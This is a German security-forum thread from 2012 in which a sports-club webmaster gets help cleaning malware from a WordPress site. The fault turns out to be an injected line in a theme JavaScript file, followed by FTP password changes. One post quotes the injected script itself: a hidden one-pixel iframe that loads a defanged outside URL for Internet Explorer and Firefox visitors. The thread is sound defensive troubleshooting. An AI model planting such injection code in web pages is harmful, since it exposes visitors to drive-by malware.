Zurück   Trojaner-Board > Web/PC > Alles rund um Windows

Alles rund um Windows: Trojaner auf Website

Windows 7 Hilfe zu allen Windows-Betriebssystemen: Windows XP, Windows Vista, Windows 7, Windows 8(.1) und Windows 10 / Windows 11- als auch zu sämtlicher Windows-Software. Alles zu Windows 10 ist auch gerne willkommen. Bitte benenne etwaige Fehler oder Bluescreens unter Windows mit dem Wortlaut der Fehlermeldung und Fehlercode. Erste Schritte für Hilfe unter Windows.

Antwort
Alt 08.02.2012, 18:33   #1
clemixx
 
Trojaner auf Website - Standard

Problem: Trojaner auf Website



Hallo Leute,

und zwar scheint es so als ob wir einen Trojaner auf unserer Vereinswebsite haben. (hxxp://www.ttcelbe.de/)
Es gibt verschiedene Symptome: Virenscanner meldet Viren, Java stürzt ab, WMP öffnet sich plötzlich, kurz nach Öffnen der Seite werden teilweise auch auf den jeweiligen Rechnern Viren gefunden.
Es gab eine Meldung des Trojaners "Exploit-CVE2010-0806" und die IP-Adressen von "hxxp://194.60.242.36/sv/count.php?add=1" bzw. "hxxp://194.60.242.166" werden als schädlich erkannt.
Der Hoster hat bei sich schon einen Virenscan durchgeführt, war aber fehlerfrei.
Könnt ihr mir weiterhelfen?

Viele Grüße
Clemens

Alt 08.02.2012, 18:50   #2
Shadow
/// Mr. Schatten
 
Trojaner auf Website - Standard

Trojaner auf Website Anleitung / Hilfe



Ja, möglich.
Aber eigentlich sollte dies euer Webmaster tun und können.
Man müsste auch wissen, was wurde bereits getan bzw. wurde schon was getan?
Zumindest auf der Startseite befinden sich wohl Code-Reste die dort auf jeden Fall falsch sind - könnte aber die unsaubere und unvollendete Säuberung von der eventuellen Malware sein.

194.60.242.36 ist auf jeden Fall in Sibirien.

Auf welcher Seite kommt denn die Virenwarnung?
__________________

__________________

Alt 08.02.2012, 19:18   #3
clemixx
 
Trojaner auf Website - Standard

Trojaner auf Website Details



Einzige was bisher getan wurde, das Plugin von Google Analytics gelöscht, weil das da stand, als ich auf eine der IP-Adressen gegangen bin, aber hatte wohl eher weniger damit zu tun.

Die Meldung kommt bei jeder Seite, die man öffnet.

Ist ja die Frage, ob unbewusst irgendeine schädliche Datei hochgeladen wurde, die zu löschen ist oder sich jmd eingehackt hat und was eingepflanzt hat.
__________________

Alt 08.02.2012, 20:14   #4
Shadow
/// Mr. Schatten
 
Trojaner auf Website - Standard

Lösung: Trojaner auf Website



Möglicherweise/wahrscheinlich sitzt die Malware im "Theme" =>
...ttcelbe.de/wordpress/wp-content/themes/traction_pro/javascripts/ traction . js
Zeile 9
__________________
alle Tipps + Hilfen aller Helfer sind ohne Gewähr + Haftung
keine Hilfe via PN
hier ist ein Forum, jeder kann profitieren/kontrollieren - niemand ist fehlerfrei
tendenzielle Beachtung der Rechtschreibregeln erhöht die Wahrscheinlichkeit einer Antwort
-


Alt 08.02.2012, 20:43   #5
clemixx
 
Trojaner auf Website - Standard

Wie Trojaner auf Website



Cool, danke! Das scheint es wirklich gewesen zu sein, die eine Zeile wurde dort neu hinzugefügt und jetzt werden keine Meldungen mehr angezeigt.
Wie bist du auf die Datei gekommen?


Alt 08.02.2012, 20:59   #6
Shadow
/// Mr. Schatten
 
Trojaner auf Website - Standard

Wo Trojaner auf Website Lösung!



Ohne JavaScript war nichts.
Direkte Links und in den Seiten (im Quelltext) sich befindende Scripts (bzw. der Quelltext an sich) schienen sauber zu sein, meinem Auge ist nichts aufgefallen außer auf der Startseite ganz unten nach </body> und </html> befindet sich noch ein </div>. Dies hat dort nichts zu suchen.
Allerdings ist dort unten "gerne" fremder ("illegaler") Content, deshalb habe ich u.a. dort manuell einfach im Quelltext nachgesehen.
Also musste die Malware in einem "externen" Script sein. Und weil mir es zu blöd war da alles manuell zu durchsuchen, habe ich zu meiner Linklesezeichenliste gegriffen.

http://sitecheck.sucuri.net/scanner/

Und die Zeile 9 hat auch (dann) das typische Aussehen eines maliciösen Inhalts gehabt.
BTW:
Zitat:
Description: This malware infects a web site through a compromised desktop (with virus), where it steals any stored password from the FTP client and uses that to attack the site.

Note that every PHP, HTML and JS file can get compromised by this malware. On some variations of this attack, it is also compromised through vulnerable versions of Timthumb/WordPress.

Some anti virus programs will flag this type of malware (after infecting a computer) as Blackhole Exploit kit or similar names.

Affecting: Any web site with FTP enabled (and password stolen).

Clean up: The desktop must be cleaned first. Use multiple AVs if necessary, since this virus is very good at hiding from the current AV that is running. Once it is clean, then you can clean up the sites and change the passwords.
(Desktop bezeichnet hier einen "Desktop-PC")
__________________
--> Trojaner auf Website

Alt 09.02.2012, 11:26   #7
clemixx
 
Trojaner auf Website - Standard

Trojaner auf Website



Achso alles klar, die Seite muss ich mir gleich mal merken ;-)

Ist es jetzt auch am sinnvollsten FTP-PW etc. zu ändern?

Alt 10.02.2012, 09:56   #8
Shadow
/// Mr. Schatten
 
Trojaner auf Website - Standard

Trojaner auf Website



Ja, unbedingt das FTP-Passwort (alle!) ändern.

Also die Passwörter aller (!) FTP-Zugänge zu dieser Internet-Präsenz und außerdem sollten ALLE PCs, auf denen ein FTP-Zugang zu dieser Internetpräsenz eingerichtet ist, sorgfältig und tiefgehend überprüft werden und zumindest auf dem ursächlichen PC auch wiederum alle FTP-Passwörter geändert werden.
__________________
alle Tipps + Hilfen aller Helfer sind ohne Gewähr + Haftung
keine Hilfe via PN
hier ist ein Forum, jeder kann profitieren/kontrollieren - niemand ist fehlerfrei
tendenzielle Beachtung der Rechtschreibregeln erhöht die Wahrscheinlichkeit einer Antwort
-


Alt 27.06.2012, 12:44   #9
clemixx
 
Trojaner auf Website - Standard

Trojaner auf Website



Hey,
ich muss mich jetzt nach einiger Zeit nochmals melden. Gleiche Website - ähnliches Problem. Ich weiß nicht, ob es noch Überreste der letzten Malware sind oder ob es wieder etwas neues ist. Jedenfalls wurde unsere Website nun von Google gesperrt. Jedoch ist sie (meist) nur im FF nicht erreichbar.
Problem, was ich bisher gefunden habe - fremder Code am Ende der Startseite:

Code:
ATTFilter
<script>var url="hxxp://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}</script>
         
Weiß blos nicht woher der Code stammt. Habe auch schon meinen erhaltenen Webspace nahezu platt gemacht (soweit, dass Wordpress keie Fehler bringt) aber im Quellcode war immernoch die Meldung als Einziges vorhanden und die übrigen Dateien wiesen keine großen Auffälligkeiten auf. Kann ich überhaupt was dagegen machen oder ist mein Hoster betroffen? Denn, wenn ich die ebenfalls infizierten Websites der Google-Diagnoseseite ansehe, sind einige davon ebenfalls beim gleichen Hoster!

Danke für eure Hilfe...
clemixx

Alt 27.06.2012, 13:13   #10
Shadow
/// Mr. Schatten
 
Trojaner auf Website - Standard

Trojaner auf Website [gelöst]



Du hättest dir BEVOR du was verändert hattest, einfach mal Datum und Uhrzeit ansehen sollen.

Es ist immer auch ein Möglichkeit, dass ein Hoster eines Multidomainservers tatsächlich auch ein grundlegendes Problem hat, dann sollten aber eher alle Domains/Websites auf mindestens diesem einem Server betroffen sein.

An sich ist meines Wissens dein Hoster aber nicht als dunkleres Schaf (grau oder schwarz) bekannt.
Allerdings können falsche Rechtevergabe und veraltete Serversoftware, PHP-Versionen und darauf aufsetzende Anwendungen schon auch Lücken schaffen. Und mancher Hoster belässt auf alten Verträgen/alten Servern auch längst grob veraltete Software.
__________________
alle Tipps + Hilfen aller Helfer sind ohne Gewähr + Haftung
keine Hilfe via PN
hier ist ein Forum, jeder kann profitieren/kontrollieren - niemand ist fehlerfrei
tendenzielle Beachtung der Rechtschreibregeln erhöht die Wahrscheinlichkeit einer Antwort
-


Alt 27.06.2012, 13:31   #11
clemixx
 
Trojaner auf Website - Standard

Trojaner auf Website [gelöst]



Von allen hab ich das nicht getan, aber bei den Hauptdateien war nichts auffälliges.

Ja dächte ich eigentlich auch nicht, aber da es nun doch anscheinend bei einigen Websites diese Probleme gibt und sich der Hoster auch nicht auf meine Nachfragen meldet..! Muss ja auch nur mindestens dieser eine Server betroffen sein..

Noch etwas, was ich an meiner Stelle jetzt tun kann?

Alt 27.06.2012, 14:08   #12
Shadow
/// Mr. Schatten
 
Trojaner auf Website - Standard

Trojaner auf Website [gelöst]



Zitat:
Zitat von clemixx Beitrag anzeigen
Noch etwas, was ich an meiner Stelle jetzt tun kann?
Augen auf und eine neue Seitenüberprüfung bei Google beantragen.
Du magst einfach mal bei den dir bekannten Websites mit ähnlichem/gleichem Problem schauen, ob sie auf dem selben Server liegen
ping domain-name.tld
Darüber hinaus kontrolliere ob Server-Software (Webserver, PHP etc.) aktuell ist. Wenn nicht, sprich deinen Hoster mal auf eine Aktualisierung an, es ist aber Branchenüblich, dass die Software gerne auf dem Stand des Vertragsabschlusses bleibt (vorallem wenn der alte Vertrag irgendwo besser ist, du also für diese Leistung UND neues PHP (als Beispiel) etwas mehr zahlen musst).
__________________
alle Tipps + Hilfen aller Helfer sind ohne Gewähr + Haftung
keine Hilfe via PN
hier ist ein Forum, jeder kann profitieren/kontrollieren - niemand ist fehlerfrei
tendenzielle Beachtung der Rechtschreibregeln erhöht die Wahrscheinlichkeit einer Antwort
-


Alt 27.06.2012, 15:16   #13
clemixx
 
Trojaner auf Website - Standard

Trojaner auf Website [gelöst]



Das klingt alles nach Vorsichtsmaßnahmen, das Ding ist nur, dass die Seite z.Zt. nicht erreichbar ist.
Seitenüberprüfung von Google habe ich auch schon vor mehreren Tagen beantragt, da regt sicht nix. Ist es denn sonst zuverlässig?!
Also der Großteil der betroffenen Websites liegt tatsächlich auf dem gleichen Server.
Ja das ist richtig, die Software ist nicht die aktuellste, könnte man in Zukunft aktualisieren.

Alt 27.06.2012, 16:43   #14
Shadow
/// Mr. Schatten
 
Trojaner auf Website - Standard

Trojaner auf Website [gelöst]



Zitat:
Zitat von clemixx Beitrag anzeigen
Das klingt alles nach Vorsichtsmaßnahmen, das Ding ist nur, dass die Seite z.Zt. nicht erreichbar ist.
Seitenüberprüfung von Google habe ich auch schon vor mehreren Tagen beantragt, da regt sicht nix. Ist es denn sonst zuverlässig?!
Ich hatte mal eine Kunden-Website - also seit dem habe ich diesen Kunden auch dort als Kunden, vorher nur die PCs - mit solchartiger Malware (ich weiß aber jetzt den echten Hoster nicht mehr, war über einen kleinen Reseller bei einem kleinen Wiederverkäufer der Reseller bei einem größerem Wiederverkäufer ....), da hat Google relativ schnell reagiert, wenn man darauf wartet natürlich eindeutig nicht schnell genug.

Erreichbar ist die Site (technisch) natürlich schon, nur nicht über die Google-Suche und nicht direkt und ohne Warnhinweis über Browser, die sich auf Googles Warnung verlassen.
__________________
alle Tipps + Hilfen aller Helfer sind ohne Gewähr + Haftung
keine Hilfe via PN
hier ist ein Forum, jeder kann profitieren/kontrollieren - niemand ist fehlerfrei
tendenzielle Beachtung der Rechtschreibregeln erhöht die Wahrscheinlichkeit einer Antwort
-


Alt 27.06.2012, 17:37   #15
clemixx
 
Trojaner auf Website - Standard

Trojaner auf Website [gelöst]



Naja erreichbar ist sie vlt, aber sollte man ja aufrgund der Malware schon meiden, was?

So nachdem ich im Wordpress-Verzeichnis ewig nach Infektionen gesucht habe, habe ich nun gesehen, dass sich im root noch eine index.php befindet, in der relativ lange Zeichenketten eingebunden waren, die so da nicht hingehörten. Ob die wohl durch ein Plug-In, der (leicht) veralteten Software auf dem Server oder anderes dahin gelangt sind, weiß ich nicht. Aber jetzt sollte es zumindest wieder gehen.

Antwort

Themen zu Trojaner auf Website
durchgeführt, ip-adresse, java, leute, melde, meldet, meldung, plötzlich, rechner, rechnern, scan, scanner, schei, seite, stürzt, stürzt ab, troja, trojaner, trojaners, verschiedene, virenscan, virenscanner, website, weiterhelfen, wmp, öffnet




Ähnliche Themen: Trojaner auf Website


  1. Windows 7: Avast meldet bei JEDER Website "schädliche Website blockiert"!
    Plagegeister aller Art und deren Bekämpfung - 02.02.2014 (20)
  2. Website wird von Avast blockiert - Trojaner Warnung
    Log-Analyse und Auswertung - 01.12.2013 (1)
  3. Avast meldet Trojaner auf meiner Website?
    Plagegeister aller Art und deren Bekämpfung - 09.06.2013 (13)
  4. Test ob auf Website ein Trojaner vorhanden ist -Testverfahren
    Plagegeister aller Art und deren Bekämpfung - 29.05.2013 (6)
  5. Trojaner auf Website
    Plagegeister aller Art und deren Bekämpfung - 19.02.2013 (5)
  6. GVU-Trojaner über hawaiidermatology.com? + unsichere eigene Website durch diesen Trojaner?
    Plagegeister aller Art und deren Bekämpfung - 15.01.2013 (16)
  7. Trojaner in Index.php Datei - Kein Zugriff auf Website
    Plagegeister aller Art und deren Bekämpfung - 13.11.2012 (0)
  8. Website kann nicht geöffnet werden Trojaner
    Log-Analyse und Auswertung - 08.10.2012 (8)
  9. Joomla-Website 3x gehackt - lt. Admin Trojaner auf meinem PC?
    Plagegeister aller Art und deren Bekämpfung - 17.08.2012 (18)
  10. Habe ich einen Trojaner auf meiner Website?
    Log-Analyse und Auswertung - 31.05.2012 (11)
  11. Meine Website versendet angeblich einen Trojaner
    Plagegeister aller Art und deren Bekämpfung - 27.03.2012 (1)
  12. Meine Website verteilt Trojaner - und ich weiß nichts davon?
    Plagegeister aller Art und deren Bekämpfung - 28.12.2011 (0)
  13. Trojaner auf Website ?
    Plagegeister aller Art und deren Bekämpfung - 09.12.2010 (1)
  14. Trojaner wird per iframe auf Website eingebunden
    Plagegeister aller Art und deren Bekämpfung - 06.10.2010 (1)
  15. Maleware / Trojaner auf meiner Website
    Antiviren-, Firewall- und andere Schutzprogramme - 20.08.2009 (1)
  16. 10-TAN Trojaner: Bank-Website fragt 10 PINs ab!
    Plagegeister aller Art und deren Bekämpfung - 08.01.2009 (2)
  17. trojaner über die Website ?
    Plagegeister aller Art und deren Bekämpfung - 08.07.2005 (5)

Zum Thema Trojaner auf Website - Hallo Leute, und zwar scheint es so als ob wir einen Trojaner auf unserer Vereinswebsite haben. (hxxp://www.ttcelbe.de/) Es gibt verschiedene Symptome: Virenscanner meldet Viren, Java stürzt ab, WMP öffnet sich - Trojaner auf Website...
Archiv
Du betrachtest: Trojaner auf Website auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.